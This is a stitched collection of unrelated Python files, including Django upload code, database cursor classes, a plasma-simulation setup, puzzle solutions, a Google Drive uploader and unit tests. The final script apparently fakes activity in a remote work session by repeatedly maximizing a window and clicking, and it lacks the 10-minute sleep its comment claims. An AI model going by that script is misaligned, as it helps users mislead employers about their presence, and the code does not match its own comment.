            name = uf.cleaned_data["name"]
            # Romanize the (Chinese) name into an underscore-joined pinyin slug.
            eng_name = Pinyin().get_pinyin(name, "_").replace(" ", "_")
            head_img = uf.cleaned_data["headImg"]
            image = Image()
            image.name = name
            image.eng_name = eng_name
            image.headImg = head_img
            image.save()
            return HttpResponse("Upload OK !")
    else:
        uf = ImageForm()
    # NOTE(review): indentation reconstructed -- this return is assumed to
    # be shared by the GET path and the invalid-POST path (re-rendering the
    # bound form); confirm against the original file.
    return render_to_response('army/upload.html', {"uf": uf})
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Base classes for cursors.
These classes centralize common code.
"""
from vtdb import dbexceptions
class BasePEP0249Cursor(object):
    """Cursor with common PEP0249 implementations.

    Python 2 code: iteration uses the old-style next() method.
    """

    def __init__(self):
        self._clear_common_state()
        self._conn = None  # set by subclasses; None once the cursor is closed

    def callproc(self):
        """For PEP 0249 (not supported by this driver)."""
        raise dbexceptions.NotSupportedError

    def executemany(self, sql, params_list):
        """For PEP 0249 (not supported by this driver)."""
        _ = sql, params_list
        raise dbexceptions.NotSupportedError

    def nextset(self):
        """For PEP 0249 (not supported by this driver)."""
        raise dbexceptions.NotSupportedError

    def setinputsizes(self, sizes):
        """For PEP 0249 (intentionally a no-op)."""
        _ = sizes

    def setoutputsize(self, size, column=None):
        """For PEP 0249 (intentionally a no-op)."""
        _ = size, column

    @property
    def rownumber(self):
        # 0-based index of the next row to be fetched.
        return self.index

    def __iter__(self):
        """For PEP 0249: To make cursors compatible to the iteration protocol."""
        return self

    def next(self):
        """For PEP 0249 (Python 2 iterator protocol)."""
        val = self.fetchone()
        if val is None:
            raise StopIteration
        return val

    def close(self):
        """For PEP 0249 (implemented by subclasses)."""
        raise NotImplementedError

    def fetchone(self):
        """For PEP 0249 (implemented by subclasses)."""
        raise NotImplementedError

    def fetchmany(self, size=None):
        """For PEP 0249 (implemented by subclasses)."""
        raise NotImplementedError

    def fetchall(self):
        """For PEP 0249 (implemented by subclasses)."""
        raise NotImplementedError

    def _clear_common_state(self):
        # Reset the fetch position.
        self.index = 0

    @property
    def connection(self):
        # Raise instead of returning None so use of a closed cursor is loud.
        if not self._conn:
            raise dbexceptions.ProgrammingError(
                'Cannot use closed cursor %s.' % self.__class__)
        return self._conn
class BaseListCursor(BasePEP0249Cursor):
    """Base cursor where results are stored as a list.

    Execute call should return a (results, rowcount, lastrowid,
    description) tuple. The fetch commands traverse self.results.
    """

    arraysize = 1  # PEP 0249 default fetchmany size

    def __init__(self, single_db=False, twopc=False):
        super(BaseListCursor, self).__init__()
        self._clear_list_state()
        self.effective_caller_id = None
        self.single_db = single_db  # restrict transactions to a single db
        self.twopc = twopc          # use two-phase commit

    def _clear_list_state(self):
        # Reset all per-execute state.
        self._clear_common_state()
        self.description = None
        self.lastrowid = None
        self.rowcount = None
        self.results = None

    def set_effective_caller_id(self, effective_caller_id):
        """Set the effective caller id that will be used in upcoming calls."""
        self.effective_caller_id = effective_caller_id

    def begin(self):
        return self.connection.begin(
            effective_caller_id=self.effective_caller_id,
            single_db=self.single_db)

    def commit(self):
        return self.connection.commit(self.twopc)

    def rollback(self):
        return self.connection.rollback()

    def _check_fetch(self):
        # Guard: results only exist after a successful execute.
        if self.results is None:
            raise dbexceptions.ProgrammingError('Fetch called before execute.')

    def _handle_transaction_sql(self, sql):
        """Intercept bare begin/commit/rollback statements.

        Returns True when *sql* was one of those and has been handled.
        """
        sql_check = sql.strip().lower()
        if sql_check == 'begin':
            self.begin()
            return True
        elif sql_check == 'commit':
            self.commit()
            return True
        elif sql_check == 'rollback':
            self.rollback()
            return True
        else:
            return False

    def close(self):
        self._clear_list_state()
        self._conn = None  # cursor is unusable afterwards

    def fetchone(self):
        self._check_fetch()
        if self.index >= len(self.results):
            return None  # exhausted
        self.index += 1
        return self.results[self.index - 1]

    def fetchmany(self, size=None):
        self._check_fetch()
        if self.index >= len(self.results):
            return []
        if size is None:
            size = self.arraysize
        res = self.results[self.index:self.index + size]
        self.index += size
        return res

    def fetchall(self):
        # Everything that has not been fetched yet.
        self._check_fetch()
        return self.fetchmany(len(self.results) - self.index)
class BaseStreamCursor(BasePEP0249Cursor):
    """Base cursor where results are returned as a generator.

    This supports large queries. An execute call returns a (generator,
    description) pair. The fetch functions read items from the generator
    until it is exhausted.

    Python 2 code: uses generator.next() and xrange.
    """

    arraysize = 1  # PEP 0249 default fetchmany size

    def __init__(self):
        super(BaseStreamCursor, self).__init__()
        self._clear_stream_state()
        self.effective_caller_id = None

    def set_effective_caller_id(self, effective_caller_id):
        """Set the effective caller id that will be used in upcoming calls."""
        self.effective_caller_id = effective_caller_id

    def _clear_stream_state(self):
        # Reset all per-execute state.
        self._clear_common_state()
        self.description = None
        self.generator = None

    def fetchone(self):
        # description doubles as the "execute has run" flag.
        if self.description is None:
            raise dbexceptions.ProgrammingError('Fetch called before execute.')
        self.index += 1
        try:
            return self.generator.next()
        except StopIteration:
            return None  # stream exhausted

    # fetchmany can be called until it returns no rows. Returning less rows
    # than what we asked for is also an indication we ran out, but the cursor
    # API in PEP249 is silent about that.
    def fetchmany(self, size=None):
        if size is None:
            size = self.arraysize
        result = []
        for _ in xrange(size):
            row = self.fetchone()
            if row is None:
                break
            result.append(row)
        return result

    def fetchall(self):
        # Drain the remainder of the stream into a list.
        result = []
        while True:
            row = self.fetchone()
            if row is None:
                break
            result.append(row)
        return result

    def close(self):
        # Close the underlying stream before dropping state.
        if self.generator:
            self.generator.close()
        self._clear_stream_state()
        self._conn = None
|
from pypm.icp import ICP
from pypm.data_points import DataPoints |
import time

try:
    add = 5
    # BUG FIX: the original wrote assert(add == 5, '错误'), which asserts a
    # two-element tuple. A non-empty tuple is always truthy, so that assert
    # could never fail (CPython even emits a SyntaxWarning for it). The
    # message belongs after a comma, outside any parentheses.
    assert add == 5, '错误'
    # raise NameError('错误')
except Exception as e:
    # Print the exception message instead of crashing.
    print(e)
else:
    # Runs only when the try body raised nothing.
    print('pass')

# Current local time, formatted.
print(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))
#!/usr/bin/env python3
#
# This example illustrates the use of the 'TRANSFORMER' boundary
# condition for the poloidal flux equation, whereby a resistive wall
# is assumed, along with a non-zero applied loop voltage via the
# transformer (passing through major radius R = 0).
#
# Run as
#
# $ ./generate.py
# $ ../../build/iface/dreami dream_settings.h5
#
# ###################################################################
import numpy as np
import sys
sys.path.append('../../py/')
from DREAM.DREAMSettings import DREAMSettings
import DREAM.Settings.Equations.ElectricField as ElectricField
import DREAM.Settings.Equations.IonSpecies as Ions
import DREAM.Settings.Equations.RunawayElectrons as Runaways
import DREAM.Settings.Solver as Solver
import DREAM.Settings.CollisionHandler as Collisions
ds = DREAMSettings()
# Physical parameters
n = 5e19 # Electron density (m^-3)
T = 100 # Temperature (eV)
# Grid parameters
tMax = 5e-1 # simulation time in seconds
Nt = 40 # number of time steps
Nr = 30 # number of radial grid points
# Tokamak parameters
a = 0.9 # minor radius (m) — passed to radialgrid.setMinorRadius
b = 1.2 # wall radius (m) — passed to radialgrid.setWallRadius
B0 = 3.1 # magnetic field (T) — passed to radialgrid.setB0
R0 = 2.96 # major radius (m)
tau_wall = 0.01 # resistive wall time (s); boundary condition uses 1/tau_wall
# Set E_field: solved self-consistently with the TRANSFORMER boundary
# condition described in the file header — resistive wall (inverse wall
# time 1/tau_wall) plus an applied loop voltage (0.4, normalized by R0
# per the parameter name V_loop_wall_R0).
#ds.eqsys.E_field.setInitialProfile(0)
ds.eqsys.E_field.setType(ElectricField.TYPE_SELFCONSISTENT)
ds.eqsys.E_field.setBoundaryCondition(ElectricField.BC_TYPE_TRANSFORMER, V_loop_wall_R0=0.4/R0, inverse_wall_time=1/tau_wall, R0=R0)
# Set temperature (prescribed, spatially/temporally constant)
ds.eqsys.T_cold.setPrescribedData(T)
# Set ions: fully ionized deuterium at the prescribed density n
ds.eqsys.n_i.addIon(name='D', Z=1, iontype=Ions.IONS_PRESCRIBED_FULLY_IONIZED, n=n)
# Disable kinetic grids
ds.hottailgrid.setEnabled(False)
ds.runawaygrid.setEnabled(False)
# Set up radial grid
ds.radialgrid.setB0(B0)
ds.radialgrid.setMinorRadius(a)
ds.radialgrid.setWallRadius(b)
ds.radialgrid.setNr(Nr)
# Set solver type
ds.solver.setType(Solver.NONLINEAR)
# Include otherquantities to save to output
ds.other.include('fluid')
# Set time stepper
ds.timestep.setTmax(tMax)
ds.timestep.setNt(Nt)
ds.output.setTiming(stdout=True, file=True)
ds.output.setFilename('output.h5')
# Save settings to HDF5 file
ds.save('dream_settings.h5')
|
# Copyright Ramón Vila Ferreres - 2021
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
# FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from typing import *
import dateutil.parser
from datetime import datetime
class CalendarEvent:
    """Represents a single calendar event in several formats.

    Parses the raw event dict's ISO start/end timestamps and stores a
    normalized field dict that to_list() can project into CSV column order.
    """

    def __init__(self, configuration: dict, event: dict):
        """Build the normalized field dict from a raw event dict."""
        self.configuration = configuration

        start = self.__parse_datestring(event["start"])
        end = self.__parse_datestring(event["end"])

        # Newlines are stripped so the fields stay single-line in CSV output.
        self.event: dict = {
            "description": event["description"].replace("\n", ""),
            "subject" : event['title'].replace("\n", ""),
            "start_date" : start.strftime("%m/%d/%Y"),
            "start_time" : start.strftime("%H:%M:%S"),
            "end_date" : end.strftime("%m/%d/%Y"),
            "end_time" : end.strftime("%H:%M:%S"),
        }

    def __parse_datestring(self, datestring: str) -> datetime:
        """Parse an ISO-8601 timestamp string into a datetime."""
        return dateutil.parser.isoparse(datestring)

    def to_list(self) -> List[Any]:
        """Return the event's fields ordered by the configured CSV headers."""
        csv_headers = self.configuration["parser"]["formats"]["csv"]["headers"].split(",")
        # Header "Start Date" maps to field key "start_date"; building a dict
        # keyed by header (as the original did) also deduplicates repeats.
        ordered = {header: self.event[header.lower().replace(" ", "_")] for header in csv_headers}
        return list(ordered.values())
# Demonstrations of anonymous functions and closures.

lamb = lambda x: x ** 3
print(lamb(3))


def writer():
    """Return a greeter function closing over the honorific title."""
    title = 'Sir'

    def name(x):
        return title + ' ' + x

    return name


w = writer()
print(w('Breno Polanski'))

# Power functions in a list; each lambda binds its own parameter, so the
# classic late-binding closure pitfall does not apply here.
L = [lambda x: x ** 2, lambda x: x ** 3, lambda x: x ** 4]
for func in L:
    print(func(3))
# -*- encoding:utf-8 -*-
# __author__=='Gan'
# Given a string s, partition s such that every substring of the partition is a palindrome.
# Return all possible palindrome partitioning of s.
# For example, given s = "aab",
# Return
# [
# ["aa","b"],
# ["a","a","b"]
# ]
# 22 / 22 test cases passed.
# Status: Accepted
# Runtime: 175 ms
# Your runtime beats 42.93 % of python submissions.
class Solution(object):
    def partition(self, s):
        """
        Return all palindrome partitionings of s via backtracking.
        :type s: str
        :rtype: List[List[str]]
        """
        results = []

        def backtrack(rest, chosen):
            # When nothing remains, the chosen prefixes form one complete
            # palindrome partition of the original string.
            if not rest:
                results.append(chosen[:])
                return
            for cut in range(1, len(rest) + 1):
                prefix = rest[:cut]
                if prefix == prefix[::-1]:
                    backtrack(rest[cut:], chosen + [prefix])

        backtrack(s, [])
        return results
if __name__ == '__main__':
    # Smoke test with the example from the problem statement.
    print(Solution().partition('aab'))
|
def fibonacci(n):
    """
    This function returns the nth value of fibonacci series
    Input: integer (n)
    Output: fibonacci[n]

    Rewritten iteratively: the original double recursion was O(2^n); this
    runs in O(n) and returns identical values for n >= 0.
    """
    if n == 0:
        return 0
    if n == 1 or n == 2:
        return 1
    previous, current = 1, 1
    for _ in range(n - 2):
        previous, current = current, previous + current
    return current
def lucas(n):
    """
    This function returns the nth value of lucas series
    Input: integer (n)
    Output: lucas[n]

    Rewritten iteratively: the original double recursion was O(2^n); this
    runs in O(n) and returns identical values for n >= 0.
    """
    if n == 0:
        return 2
    if n == 1:
        return 1
    previous, current = 2, 1
    for _ in range(n - 1):
        previous, current = current, previous + current
    return current
def sum_series(n, first=0, second=1):
    """
    This function returns the nth value of user custom series in which each element is the sum of the previous two elements, first and second elements are user defined
    Input: integer, first element (integer) optional, second element (integer) optional
    Output: nth element of the resulting series

    Defaults (0, 1) give the Fibonacci series; (2, 1) gives the Lucas series.
    Rewritten iteratively: the original double recursion was O(2^n); this
    runs in O(n) and returns identical values for n >= 0.
    """
    if n == 0:
        return first
    if n == 1:
        return second
    previous, current = first, second
    for _ in range(n - 1):
        previous, current = current, previous + current
    return current
|
import os.path
import pickle
import sys
from google.auth.transport.requests import Request
from google_auth_oauthlib.flow import InstalledAppFlow
from googleapiclient.discovery import build
from googleapiclient.http import MediaFileUpload
from termcolor import colored
# ================ CONFIG ================
# ID of Google Drive folder to upload to
DRIVE_FOLDER_ID = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
# If file with given name already exists in folder,
# Add revision instead of new file.
REVISE_EXISTING = True
# MIMETYPE of file uploading (can be blank)
MIMETYPE = ""  # eg, "application/json" or "text/csv"
# =========================================


# Terminal-formatting helpers. Written as defs rather than the original
# lambda assignments (PEP 8 E731: don't bind lambdas to names).
def boldify(x):
    """Return x wrapped in bold terminal escapes."""
    return colored(x, attrs=["bold"])


def blueify(x):
    """Return x in bold blue."""
    return colored(x, "blue", attrs=["bold"])


def greenify(x):
    """Return x in bold green."""
    return colored(x, "green", attrs=["bold"])


def redify(x):
    """Return x in bold red."""
    return colored(x, "red", attrs=["bold"])
def prompt(text, options="y/n", default="y"):
    """
    Helper function for dealing with user prompts.
    - Prompts user for input
    - Formats the options, highlighting the default.
    - Returns the default if input is empty
    """
    highlighted = options.replace(default, blueify(default))
    answer = input(f"{text} [{highlighted}]: ")
    # Empty input means the user accepted the default.
    return answer or default
class Uploader:
    """For uploading files to Google Drive.

    Authenticates against the Drive v3 API (OAuth credentials cached in
    token.pickle) and uploads a file either as a new Drive item or as a
    new revision of an existing one.
    """
    # OAuth scope: access only to files created/opened by this app.
    scopes = ["https://www.googleapis.com/auth/drive.file"]
    drive_folder_id = DRIVE_FOLDER_ID
    # Blank MIMETYPE config becomes None so the upload library auto-detects.
    mimetype = MIMETYPE or None
    def __init__(self):
        # Authenticated Drive v3 service client.
        self.service = self.get_creds()
    def get_creds(self):
        """Authenticate and return a Drive v3 service client.

        Loads cached credentials from token.pickle when present, refreshes
        them if expired, otherwise runs the local-server OAuth flow using
        credentials.json. Exits the process if credentials.json is missing.
        """
        creds = None
        # The file token.pickle stores the user's access and refresh tokens, and is
        # created automatically when the authorization flow completes for the first time.
        # NOTE(review): unpickling executes code if the file is tampered with;
        # acceptable for a local token cache, but worth knowing.
        if os.path.exists("token.pickle"):
            with open("token.pickle", "rb") as token:
                creds = pickle.load(token)
        # If there are no (valid) credentials available, let the user log in.
        if not creds or not creds.valid:
            if creds and creds.expired and creds.refresh_token:
                creds.refresh(Request())
            else:
                try:
                    flow = InstalledAppFlow.from_client_secrets_file(
                        "credentials.json", self.scopes
                    )
                except FileNotFoundError:
                    msg = (
                        f"\n{redify('Error!')} "
                        + "You must create a credentials.json file.\n"
                        + "    See quickstart guide: https://developers.google.com/drive/api/v3/quickstart/python\n"
                    )
                    print(msg)
                    sys.exit()
                creds = flow.run_local_server(port=0)
            # Save the credentials for the next run
            with open("token.pickle", "wb") as token:
                pickle.dump(creds, token)
        return build("drive", "v3", credentials=creds)
    def upload_to_drive(self, filename, upload_name):
        """Upload filename to the configured folder as upload_name.

        When REVISE_EXISTING is set and a file with that name already
        exists in the folder, a new revision is added instead of a
        duplicate file. Returns the Drive file id.
        """
        if REVISE_EXISTING:
            items = self._check_for_existing(filename, upload_name)
            if items:
                existing_item_id = items[0]["id"]
                return self._update_existing(filename, upload_name, existing_item_id)
        return self._upload_new(filename, upload_name)
    def _check_for_existing(self, filename, upload_name):
        """Return non-trashed Drive items in the folder matching upload_name."""
        # NOTE(review): upload_name is interpolated into the query unescaped;
        # a name containing a single quote would break the query string.
        q = f"name = '{upload_name}' and '{self.drive_folder_id}' in parents and trashed = false"
        results = self.service.files().list(q=q, fields="files(id, name)").execute()
        items = results.get("files", [])
        return items
    def _update_existing(self, filename, upload_name, existing_item_id):
        """Add the local file as a new revision of an existing Drive item."""
        print("\n> Updating existing file...")
        file_metadata = dict(name=upload_name)
        media = MediaFileUpload(filename, mimetype=self.mimetype)
        file = (
            self.service.files()
            .update(
                fileId=existing_item_id,
                body=file_metadata,
                media_body=media,
                fields="id",
            )
            .execute()
        )
        return file.get("id")
    def _upload_new(self, filename, upload_name):
        """Create a brand-new Drive file inside the configured folder."""
        print("\n> Adding new file...")
        file_metadata = dict(name=upload_name, parents=[self.drive_folder_id])
        media = MediaFileUpload(filename, mimetype=self.mimetype)
        file = (
            self.service.files()
            .create(
                body=file_metadata,
                media_body=media,
                fields="id",
            )
            .execute()
        )
        return file.get("id")
def upload(filename):
    """Prompt for new file name, confirm it, then upload to drive."""
    # BUG FIX: str.split never raises IndexError, so the original
    # try/except IndexError was dead code; os.path.basename does the
    # same job directly (and handles the platform's separators).
    default_name = os.path.basename(filename)

    while True:
        new_name = prompt("> Upload name", options=default_name, default=default_name)
        confirm = prompt(
            f"> File will be uploaded as `{new_name}`. Okay?",
            options="y/n",
            default="y",
        )
        if confirm.lower() == "y":
            break

    # upload to drive
    uploader = Uploader()
    file_id = uploader.upload_to_drive(filename, new_name)
    if file_id:
        print(greenify("> Success.\n"))
if __name__ == "__main__":
    try:
        filename = sys.argv[1]
    except IndexError:
        print("Error! No filename given.")
        sys.exit()

    print("\n(Default option is given in blue)\n")
    # BUG FIX: the f-string contained no placeholder, so the confirmation
    # prompt never showed which file was about to be uploaded.
    confirm = prompt(
        f"> Upload `{filename}` to Google Drive?", options="y/n", default="y"
    )
    if confirm.lower() == "y":
        upload(filename)
    else:
        print(redify("Aborted.\n"))
|
import unittest
import sbol3
import tyto
import labop
import uml
from labop.execution_engine import ExecutionEngine
from labop.primitive_execution import initialize_primitive_compute_output
from labop_convert import MarkdownSpecialization
from labop_convert.behavior_specialization import DefaultBehaviorSpecialization
# UML parameter-direction URIs (in/out) for protocol parameters.
PARAMETER_IN = "http://bioprotocols.org/uml#in"
PARAMETER_OUT = "http://bioprotocols.org/uml#out"
# Load the primitive libraries the protocol under test draws its steps from.
labop.import_library("sample_arrays")
labop.import_library("plate_handling")
labop.import_library("spectrophotometry")
class TestProtocolOutputs(unittest.TestCase):
    """Tests that a protocol's designated outputs appear in execution results."""
    def setUp(self):
        """Build a minimal protocol: empty 96-well plate -> A1 wells -> absorbance read."""
        doc = sbol3.Document()
        protocol = labop.Protocol("foo")
        doc.add(protocol)
        plate_spec = labop.ContainerSpec(
            "my_absorbance_measurement_plate",
            name="my absorbance measurement plate",
            queryString="cont:Plate96Well",
            prefixMap={
                "cont": "https://sift.net/container-ontology/container-ontology#"
            },
        )
        plate = protocol.primitive_step("EmptyContainer", specification=plate_spec)
        # NOTE(review): f"A1" has no placeholder; a plain "A1" would suffice.
        target_wells = protocol.primitive_step(
            "PlateCoordinates", source=plate.output_pin("samples"), coordinates=f"A1"
        )
        measure_absorbance = protocol.primitive_step(
            "MeasureAbsorbance",
            samples=target_wells.output_pin("samples"),
            wavelength=sbol3.Measure(600, tyto.OM.nanometer),
        )
        # Kept for the tests below: the protocol and the measurement output pin.
        self.protocol = protocol
        self.output = measure_absorbance.output_pin("measurements")
    # @unittest.expectedFailure
    # def test_protocol_outputs_not_designated(self):
    #     # TODO: catch output parameters that aren't explicitly designated
    #     # rather than breaking cryptically
    #     agent = sbol3.Agent("test_agent")
    #     ee = ExecutionEngine(specializations=[MarkdownSpecialization("test_LUDOX_markdown.md")])
    #     ex = ee.execute(self.protocol, agent, id="test_execution", parameter_values=[])
    def test_protocol_outputs(self):
        # This test confirms generation of designated output objects
        self.protocol.designate_output(
            "measurements",
            "http://bioprotocols.org/labop#SampleData",
            source=self.output,
        )
        agent = sbol3.Agent("test_agent")
        ee = ExecutionEngine(
            specializations=[MarkdownSpecialization("test_LUDOX_markdown.md")]
        )
        ex = ee.execute(self.protocol, agent, id="test_execution", parameter_values=[])
        # The designated output should surface as a literal reference whose
        # target resolves to a labop.Dataset.
        self.assertTrue(isinstance(ex.parameter_values[0].value, uml.LiteralReference))
        self.assertTrue(
            isinstance(ex.parameter_values[0].value.value.lookup(), labop.Dataset)
        )
# Allow running this test module directly.
if __name__ == "__main__":
    unittest.main()
|
# Advent-of-Code-style puzzle: Santa and a robot alternate moves from the
# instruction stream; count how many distinct houses get at least one visit.

santaX = 0
santaY = 0
robotX = 0
robotY = 0
# A set makes the visited-check O(1); the original list membership test
# made the whole scan O(n^2).
locations = {(0, 0)}
ticker = False

instructions = ""
with open("inputData.txt", "r") as infile:
    for line in infile:
        instructions += line

# Movement deltas per arrow. BUG FIX: the original mapped '<' to +x and
# '>' to -x (mirrored east/west); by symmetry the visited COUNT was still
# correct, but the coordinates were misleading. Unknown characters
# (e.g. the trailing newline) move nobody, as before.
MOVES = {"^": (0, 1), "v": (0, -1), "<": (-1, 0), ">": (1, 0)}

for i in instructions:
    x, y = MOVES.get(i, (0, 0))
    if ticker:
        # Santa's turn (second, fourth, ... instruction).
        ticker = False
        santaX += x
        santaY += y
        locations.add((santaX, santaY))
    else:
        # Robot's turn (first, third, ... instruction).
        ticker = True
        robotX += x
        robotY += y
        locations.add((robotX, robotY))

print(len(locations))
|
# String slicing: variable[start:end] covers indices start .. end-1.
a = "Life is too short, You need Python"
book = a[0:7] # slice of indices 0-6 -> "Life is"
print(book)
book = a[12:17] # -> "short"
print(book)
print(a[0:7] + " " + a[12:17])
"""
Unit test for EC2 ipa.
"""
import unittest
import mock
from treadmill.infra.setup.ipa import IPA
from treadmill.infra import constants
class IPATest(unittest.TestCase):
    """Tests EC2 ipa setup."""
    # time.time is frozen at 1000 so the generated instance hostname
    # ('ipa1-1000.foo.bar') is deterministic in the assertions below.
    @mock.patch('time.time', mock.Mock(return_value=1000))
    @mock.patch('treadmill.infra.subnet.Subnet')
    @mock.patch('treadmill.infra.get_iam_role')
    @mock.patch('treadmill.infra.configuration.IPA')
    @mock.patch('treadmill.infra.connection.Connection')
    @mock.patch('treadmill.infra.vpc.VPC')
    @mock.patch('treadmill.infra.instances.Instances')
    def test_setup_ipa(self, InstancesMock,
                       VPCMock, ConnectionMock, IPAConfigurationMock,
                       get_iam_role_mock, SubnetMock):
        """setup() should create the instance, security groups, subnet and DHCP options."""
        ConnectionMock.context.domain = 'foo.bar'
        instance_mock = mock.Mock(metadata={'PrivateIpAddress': '1.1.1.1'})
        instance_mock.name = 'ipa'
        instance_mock.running_status = mock.Mock(return_value='passed')
        instances_mock = mock.Mock(instances=[instance_mock])
        InstancesMock.create = mock.Mock(return_value=instances_mock)
        conn_mock = ConnectionMock('route53')
        _vpc_id_mock = 'vpc-id'
        _vpc_mock = VPCMock(id=_vpc_id_mock)
        _vpc_mock.secgroup_ids = ['secgroup_id']
        _vpc_mock.gateway_ids = [123]
        # Instance health checks report 'passed' so setup can proceed.
        conn_mock.describe_instance_status = mock.Mock(
            return_value={
                'InstanceStatuses': [
                    {'InstanceStatus': {'Details': [{'Status': 'passed'}]}}
                ]
            }
        )
        _private_ip = '1.1.1.1'
        _subnet_mock = mock.Mock(
            persisted=False,
            id='subnet-id',
            vpc_id=_vpc_id_mock,
            name='subnet-name',
            get_instances=mock.Mock(return_value=instances_mock)
        )
        SubnetMock.get = mock.Mock(return_value=_subnet_mock)
        _ipa_configuration_mock = IPAConfigurationMock()
        _ipa_configuration_mock.get_userdata = mock.Mock(
            return_value='user-data-script'
        )
        ipa = IPA(
            name='ipa',
            vpc_id=_vpc_id_mock,
        )
        ipa.setup(
            image='foo-123',
            count=1,
            cidr_block='cidr-block',
            key='some-key',
            tm_release='release',
            ipa_admin_password='ipa-admin-password',
            instance_type='small',
            proid='foobar',
            subnet_name='sub-name'
        )
        get_iam_role_mock.assert_called_once_with(
            name=constants.IPA_EC2_IAM_ROLE,
            create=True
        )
        instance_mock.running_status.assert_called_once_with(refresh=True)
        _subnet_mock.refresh.assert_called()
        _subnet_mock.get_instances.assert_called_once_with(
            refresh=True,
            role='IPA'
        )
        _vpc_mock.create_security_group.assert_called_once()
        _vpc_mock.add_secgrp_rules.assert_called_once()
        _vpc_mock.delete_dhcp_options.assert_called_once()
        # DHCP options are first reset to default, then pointed at the new
        # IPA instance's private IP as the domain name server.
        self.assertCountEqual(
            _vpc_mock.associate_dhcp_options.mock_calls,
            [
                mock.mock.call(default=True),
                mock.mock.call([{
                    'Key': 'domain-name-servers', 'Values': [_private_ip]
                }])
            ]
        )
        self.assertEqual(ipa.subnet.instances, instances_mock)
        # Hostname embeds the mocked timestamp and connection domain.
        InstancesMock.create.assert_called_once_with(
            image='foo-123',
            name='ipa1-1000.foo.bar',
            count=1,
            subnet_id='subnet-id',
            instance_type='small',
            key_name='some-key',
            secgroup_ids=['secgroup_id'],
            user_data='user-data-script',
            role='IPA'
        )
        _vpc_mock.load_security_group_ids.assert_called_once_with(
            sg_names=['sg_common', 'ipa_secgrp']
        )
        _subnet_mock.persist.assert_called_once_with(
            cidr_block='cidr-block',
            gateway_id=123
        )
        self.assertEqual(
            IPAConfigurationMock.mock_calls[1],
            mock.mock.call(
                ipa_admin_password='ipa-admin-password',
                tm_release='release',
                hostname='ipa1-1000.foo.bar',
                vpc=_vpc_mock,
                proid='foobar'
            )
        )
        _ipa_configuration_mock.get_userdata.assert_called_once()
    @mock.patch('treadmill.infra.subnet.Subnet')
    @mock.patch('treadmill.infra.connection.Connection')
    @mock.patch('treadmill.infra.vpc.VPC')
    def test_ipa_destroy(self, VPCMock, ConnectionMock, SubnetMock):
        """destroy() should tear down the subnet and the IPA security group."""
        ConnectionMock.context.domain = 'foo.bar'
        _subnet_mock = SubnetMock(
            subnet_name='subnet-name'
        )
        _vpc_id_mock = 'vpc-id'
        _vpc_mock = VPCMock(id=_vpc_id_mock)
        _vpc_mock.secgroup_ids = ['secgroup_id']
        _instance = mock.Mock(private_ip='1.1.1.1')
        _instance.name = 'ipa'
        _subnet_mock.instances = mock.Mock(instances=[
            _instance
        ])
        ipa = IPA(
            vpc_id='vpc-id',
            name='ipa-setup'
        )
        ipa.subnet = _subnet_mock
        ipa.destroy(
            subnet_name='subnet-name'
        )
        _subnet_mock.destroy.assert_called_once_with(role='IPA')
        _vpc_mock.delete_security_groups.assert_called_once_with(
            sg_names=['ipa_secgrp']
        )
|
# -*- coding: cp932 -*-
"""このソースコードは blanco Frameworkによって自動生成されています。
"""
class SampleHanKatakanaCharacterGroup:
    """Sample group of half-width katakana characters.

    Rewritten from the blanco-generated chain of 60+ per-character ``if``
    statements into a single membership test against a constant string —
    far faster and much easier to audit, with identical results.
    (The code targets Python 2: inputs are byte strings decoded with the
    configured encoding via the ``unicode`` builtin.)
    """

    # Every character of the group, kept in the generated original's order.
    # The original generator's comments identify them as Windows-31J codes
    # 0xa1-0xdf (UTF-16 0xff61-0xff9f).
    GROUP_CHARACTERS = u'。「」、・ァィゥェォャュョッーアイウエオカキクケコサシスセソタチツテトナニヌネノハヒフヘホマミムメモヤユヨラリルレロワヲン゙゚'

    def __init__(self, encoding='cp932'):
        """Initialize the group.

        encoding -- byte encoding used to decode checked input (default 'cp932').
        """
        self.encoding = encoding

    def match(self, argCheck):
        """Return True when the single character argCheck belongs to the group.

        argCheck -- the character (byte string) to check.
        """
        return unicode(argCheck, self.encoding) in self.GROUP_CHARACTERS

    def matchAll(self, argCheck):
        """Return True when every character of argCheck belongs to the group.

        An empty string yields True, matching the generated original.
        Raises ValueError on None input (original message preserved).
        """
        if argCheck is None:
            # raise-as-call works on Python 2 and 3; the original
            # `raise ValueError, "..."` statement form is Python 2 only.
            raise ValueError("メソッド[matchAll]のパラメータ[argCheck]にnullが与えられました。しかし、このパラメータにnullを与えることはできません。")
        for character in unicode(argCheck, self.encoding):
            if character not in self.GROUP_CHARACTERS:
                return False
        return True

    def matchAny(self, argCheck):
        """Return True when at least one character of argCheck belongs to the group.

        An empty string yields False, matching the generated original.
        Raises ValueError on None input (original message preserved).
        """
        if argCheck is None:
            raise ValueError("メソッド[matchAny]のパラメータ[argCheck]にnullが与えられました。しかし、このパラメータにnullを与えることはできません。")
        for character in unicode(argCheck, self.encoding):
            if character in self.GROUP_CHARACTERS:
                return True
        return False
|
import mouse # pip install mouse
import pygetwindow as gw # pip install pygetwindow
import time
# Grab the remote-desktop window once at startup (first title match).
AUORemoteWindow = gw.getWindowsWithTitle('iconnectts2.auo.com')[0]

while True:  # idiomatic form of the original while(1)
    if AUORemoteWindow.isMaximized:
        print("Working from home now")
    else:
        # Bring the window up, generate activity with a right-click,
        # then tuck it away again.
        AUORemoteWindow.maximize()
        mouse.right_click()
        time.sleep(0.5)
        AUORemoteWindow.minimize()
    # Repeat every 10 minutes.
